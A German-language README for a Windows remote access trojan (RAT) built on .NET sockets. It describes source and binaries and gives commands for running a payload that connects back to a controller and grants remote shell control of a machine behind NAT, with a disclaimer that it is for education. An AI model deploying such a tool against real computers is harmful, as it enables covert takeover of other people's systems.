
Windows-Remote-Access-Trojaner (RAT)
Windows-Fernzugriffstrojaner (RAT) mit .NET-Sockets
Client-Server-Binaries und Quellcode zur Steuerung eines entfernten Rechners hinter einem NAT über eine Befehlszeilen-Shell in Windows. Obwohl der Kern die Kommunikation mit mehreren RATs unterstützt, bietet die verwendete Befehlszeilenoberfläche nur begrenzte Möglichkeiten, diese voneinander zu unterscheiden.
Das ausführbare RAT-Programm verbirgt sich weder in der Taskleiste noch im Task-Manager, da es ausschließlich zu Bildungszwecken entwickelt wurde. Bitte verwenden Sie es nicht für böswillige Zwecke.
Enthält den Quellcode und die beiden mithilfe von ILMerge gepackten Binaries.
Anleitung:
Starten Sie den Server, der als RAT fungiert, in einer Befehlszeile (Binaries\rat.exe) -> rat ip=[controller-ip-address] port=[controller-port-default-is-9999]
Starten Sie den Client, der als Controller fungiert, in einer Befehlszeile (Binaries\controller.exe) -> controller ip=[listen-ip-address] port=[listen-port-default-is-9999]
Geben Sie Befehle über die Oberfläche von controller.exe ein.